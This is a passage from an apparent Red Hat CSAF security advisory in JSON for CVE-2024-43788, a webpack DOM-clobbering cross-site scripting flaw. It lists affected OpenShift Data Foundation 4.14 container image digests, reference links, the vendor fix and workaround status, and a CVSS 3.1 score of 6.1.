"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
